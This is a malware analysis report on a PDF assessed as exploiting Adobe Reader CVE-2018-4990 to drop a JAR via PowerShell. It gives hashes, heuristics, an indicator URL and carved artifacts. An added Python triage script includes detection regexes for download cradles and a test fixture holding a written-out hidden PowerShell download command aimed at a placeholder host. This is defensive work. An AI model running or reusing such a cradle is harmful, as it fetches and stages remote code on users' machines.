Malicious PDF — malware analysis report

Static analysis result for SHA-256 34102b65d721ec9c…

Verdict: MALICIOUS
File type: PDF
Size: 42.6 KB
MD5: ee8e145df5016033325a06700f12090a
SHA-1: 29e0492ba1690bb5a4f231073c1ac38f327eaf0a
SHA-256: 34102b65d721ec9c078ae88fdf38108b3b1b4bdebeb9347c9346ec0ac3fcaa0b
Risk score: 428

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.001 PowerShell
  • T1105 Ingress Tool Transfer

The sample is a PDF assessed as exploiting CVE-2018-4990 (an Adobe Reader JPEG2000/JPX parsing flaw), a verdict supported by several critical heuristics and by a ClamAV signature on both the file and its carved script stream. The embedded script contains a PowerShell command-line cradle that downloads a JAR file from http://specforce.space into the user's temporary directory and then executes it, i.e. downloader/dropper functionality. Because this is a static result, the download and the dropped JAR were not observed executing; the URL should be treated as the primary network indicator.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9237

Heuristics (11)

  • Adobe Reader JPEG2000 JPX command payload exploit — CVE-2018-4990 (critical; CVE likely; rule CVE_2018_4990_JPX_EMBEDDED_CMD)
    PDF embeds a malformed JPX/JPEG2000 image whose JP2 header area contains a command-execution/download payload.
  • JPXDecode + active content — JPEG2000 CVE-family indicator (high; CVE related; rule PDF_JPX_CVE_2018_4990_RELATED)
    PDF uses /JPXDecode (JPEG2000) alongside JavaScript, XFA, or RichMedia indicators. This matches the delivery pattern for Adobe Reader JPEG2000 parser exploit families, including CVE-2018-4990, but does not prove the exact malformed JP2/JPX primitive.
  • Malformed JPEG2000/JP2 box structure (high; CVE related; rule PDF_JP2_BOX_ANOMALY)
    PDF embeds JPEG2000/JP2 data with malformed box sizes. This is a parser-exploit indicator for JPX/JPEG2000 CVE families, not a unique CVE fingerprint.
  • PowerShell download cradle in PDF action body (critical; rule PDF_PS_DOWNLOAD_CRADLE)
    PDF contains a PowerShell download-and-execute cradle (IEX/Invoke-Expression of a remote payload, [Net.WebClient]/[Net.ServicePointManager], or `-ep Bypass -enc <base64>`). These strings are rare in benign PDFs and are strong evidence of payload staging in an attack chain (MITRE T1059.001 + T1105).
  • ClamAV: Win.Exploit.CVE_2018_4990-6599478-0 (critical; rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Exploit.CVE_2018_4990-6599478-0
  • ClamAV detection on extracted artifact (critical; rule EXTRACTED_FILE_CLAMAV)
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator that the sample is a delivery vehicle.
  • Embedded script payload in PDF stream (high; rule PDF_EMBEDDED_SCRIPT_PAYLOAD)
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Primary URL: http://specforce.space
    All extracted URLs:
      • http://specforce.space\
      • http://www.w3.org/1999/02/22-rdf-syntax-ns#
      • http://ns.adobe.com/xap/1.0/
      • http://purl.org/dc/elements/1.1/
      • http://ns.adobe.com/xap/1.0/mm/
    The w3.org, ns.adobe.com and purl.org entries are standard XMP/RDF metadata namespace identifiers present in ordinary PDFs and are not indicators; only specforce.space is.
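The heuristics above and the artifact listing below are the output of the report's own engine. To show what those checks look like in code, the following Python script is an added example written for this page (it is not the report's engine, nor any product's code). It walks a PDF's stream objects, inflates FlateDecode bodies, walks JP2 boxes looking for impossible lengths (the PDF_JP2_BOX_ANOMALY shape), greps decoded streams for PowerShell cradle tokens and URLs (the PDF_PS_DOWNLOAD_CRADLE and EMBEDDED_URL shapes), hashes every carved stream the way the artifacts table does, and reports whether /JPXDecode co-occurs with active content (the PDF_JPX_CVE_2018_4990_RELATED shape). The regexes, function names, the output keys and the sample PDF are all assumptions made for the example; the sample is hand-assembled, uses the placeholder URL http://example.invalid/p.jar, and is not the analyzed file.

```python
import hashlib
import re
import struct
import zlib

# Indicator shapes mirroring the report's heuristics. They are triage signals, not proof of a
# specific CVE primitive (the PDF_JPX_CVE_2018_4990_RELATED caveat applies to this code too).
OBJ_STREAM = re.compile(rb"(\d+)\s+\d+\s+obj\s*(?P<dict><<(?:(?!endobj).)*?>>)\s*stream\r?\n", re.S)
ACTIVE_KEYS = re.compile(rb"/(JavaScript|JS|XFA|RichMedia|OpenAction|AA|Launch)\b")
PS_CRADLE = re.compile(
    rb"(?:\bIEX\b|Invoke-Expression|Net\.WebClient|Net\.ServicePointManager|DownloadFile"
    rb"|DownloadString|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-ep\s+Bypass"
    rb"|-ExecutionPolicy\s+Bypass)", re.I)
URL = re.compile(rb"https?://[^\s'\"\\<>)]+")

def decode_stream(d: bytes, raw: bytes) -> bytes:
    """Inflate /FlateDecode bodies; damaged zlib data still yields whatever inflates."""
    if b"/FlateDecode" not in d:
        return raw
    for inflate in (zlib.decompress, lambda b: zlib.decompressobj().decompress(b)):
        try:
            return inflate(raw)
        except zlib.error:  # bad checksum or truncation: retry with partial inflate
            continue
    return raw

def iter_streams(pdf: bytes):
    """Yield (object number, stream dictionary, raw data offset, decoded body)."""
    for m in OBJ_STREAM.finditer(pdf):
        objnum, d, start = int(m.group(1)), m.group("dict"), m.end()
        length = re.search(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)", d)  # direct /Length only
        end = start + int(length.group(1)) if length else -1
        if end < 0 or not re.match(rb"\s*endstream", pdf[end:end + 16]):
            # /Length missing, indirect or lying: fall back to the endstream keyword
            tail = re.compile(rb"\r?\nendstream").search(pdf, start)
            end = tail.start() if tail else len(pdf)
        yield objnum, d, start, decode_stream(d, pdf[start:end])

def jp2_box_anomalies(data: bytes) -> list:
    """Walk JP2 boxes ([4-byte BE length][4-byte type][payload]) and report impossible lengths.
    Length 1 means an 8-byte extended length follows; length 0 means 'to end of data'."""
    issues, pos, n = [], 0, len(data)
    while pos + 8 <= n:
        length, btype = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if length == 1 and pos + 16 <= n:
            length, header = struct.unpack(">Q", data[pos + 8:pos + 16])[0], 16
        elif length == 0:
            length = n - pos
        if length < header or pos + length > n:  # also catches a truncated XLBox header
            issues.append(f"box {btype!r} at offset {pos}: length {length}, {n - pos} bytes left")
            break
        pos += length
    return issues

def carve(pdf: bytes) -> list:
    """List every stream the way the report's 'Extracted artifacts' table does."""
    rows = []
    for objnum, d, offset, body in iter_streams(pdf):
        kind = ("jpx-image" if b"/JPXDecode" in d else
                "decompressed-pdf-stream" if b"/FlateDecode" in d else "raw-pdf-stream")
        rows.append({"obj": objnum, "offset": offset, "kind": kind, "size": len(body),
                     "sha256": hashlib.sha256(body).hexdigest()})
    return rows

def triage(pdf: bytes) -> dict:
    """Score the indicator combinations the report's heuristics describe."""
    r = {"jpx_streams": 0, "jp2_anomalies": [], "ps_cradle_hits": [], "urls": set()}
    r["active_content"] = sorted({k.decode() for k in ACTIVE_KEYS.findall(pdf)})
    r["urls"].update(u.decode(errors="replace") for u in URL.findall(pdf))
    for objnum, d, _, body in iter_streams(pdf):
        if b"/JPXDecode" in d:
            r["jpx_streams"] += 1
            r["jp2_anomalies"] += jp2_box_anomalies(body)
        r["ps_cradle_hits"] += [(objnum, t.decode(errors="replace")) for t in PS_CRADLE.findall(body)]
        r["urls"].update(u.decode(errors="replace") for u in URL.findall(body))
    r["urls"] = sorted(r["urls"])
    # JPX alone is just an image; JPX next to active content is the delivery pattern.
    r["jpx_with_active_content"] = r["jpx_streams"] > 0 and bool(r["active_content"])
    r["verdict"] = "suspicious" if (r["jp2_anomalies"] or r["ps_cradle_hits"]) else "no hits"
    return r

# Constructed test input, hand-assembled for this example. It is NOT the analyzed sample.
def stream_obj(num: int, dict_body: bytes, payload: bytes, flate: bool) -> bytes:
    data = zlib.compress(payload) if flate else payload
    filt = b" /Filter /FlateDecode" if flate else b""
    return (b"%d 0 obj\n<< %s%s /Length %d >>\nstream\n" % (num, dict_body, filt, len(data))
            + data + b"\nendstream\nendobj\n")

JP2_SIG = struct.pack(">I4s", 12, b"jP  ") + b"\x0d\x0a\x87\x0a"
GOOD_JP2 = JP2_SIG + struct.pack(">I4s", 20, b"ftyp") + b"jp2 " + b"\x00" * 4 + b"jp2 "
BAD_JP2 = JP2_SIG + struct.pack(">I4s", 0xFFFFFFFF, b"ftyp") + b"jp2 " + b"\x00" * 4  # box runs past the data
# Hypothetical cradle; example.invalid is a placeholder, not an indicator from the report.
CRADLE = (b"var cmd = \"powershell -ep Bypass -w hidden -c (New-Object Net.WebClient)"
          b".DownloadFile('http://example.invalid/p.jar', $env:TEMP + '\\\\p.jar')\";")
SAMPLE_PDF = (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /OpenAction 5 0 R >>\nendobj\n"
              + stream_obj(2, b"/Type /XObject /Subtype /Image /Filter /JPXDecode", BAD_JP2, False)
              + b"5 0 obj\n<< /S /JavaScript /JS 6 0 R >>\nendobj\n"
              + stream_obj(6, b"", CRADLE, True)
              + stream_obj(7, b"", b"this.getField('total').value = 42;", True) + b"%%EOF\n")
```

Running `triage(open(path, "rb").read())` on a real file gives the indicator summary; `carve()` gives the per-stream offset, size and SHA-256 that you would compare against the artifacts table. Two design points matter for triage use: the co-occurrence flag (`jpx_with_active_content`) is the signal, since a JPX image by itself is unremarkable, and `/Length` is only trusted when an `endstream` keyword actually follows it, because malformed samples routinely lie about stream sizes. The script does not parse xref tables, object streams (`/ObjStm`) or filters other than FlateDecode, so a sample that hides its objects that way needs to be normalised first.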

Extracted artifacts (5)

Files carved from inside the sample during analysis.

  • stream_011_off00003c6a.bin
    SHA-256: ccbd3da6d37a95e3812c47bd788bff8e2e17f7ccceef12aa4b74f370023e1edb
    Kind: decompressed-pdf-stream
    Source: PDF FlateDecoded stream at offset 0x3C6A
    Size: 4421 bytes
  • embedded_pdf_script_00006617.bin
    SHA-256: 47a56d61318c58b379b3973aafad28443d3045195e961a47bc30cdcc0e855e12
    Kind: pdf-embedded-script
    Source: PDF raw stream script payload at offset 0x6617
    Size: 2123 bytes
    Detection: ClamAV: Win.Exploit.CVE_2018_4990-6599478-0
    Obfuscation or payload: likely
    Carved artifact contains 2 shell/COM execution token(s).
  • font_00_cff_off0000222b.bin
    SHA-256: 3ad89875e6fb7800b92b2a7d51b20b4698616ec3f17bd584488b4745cd64e011
    Kind: pdf-font-stream
    Source: PDF embedded font (cff) at offset 0x222B
    Size: 1578 bytes
  • font_01_cff_off000029bd.bin
    SHA-256: 3a17193309221acd3b14a1e6df5d926a7a593cd7f9157854e6522e53f84f7ae5
    Kind: pdf-font-stream
    Source: PDF embedded font (cff) at offset 0x29BD
    Size: 5575 bytes
  • font_03_cff_off00004b2a.bin
    SHA-256: edbe3f1c296d2b7929f185c6c434feb1b033d2ed4a58a89c1b7c4c18a780461e
    Kind: pdf-font-stream
    Source: PDF embedded font (cff) at offset 0x4B2A
    Size: 7550 bytes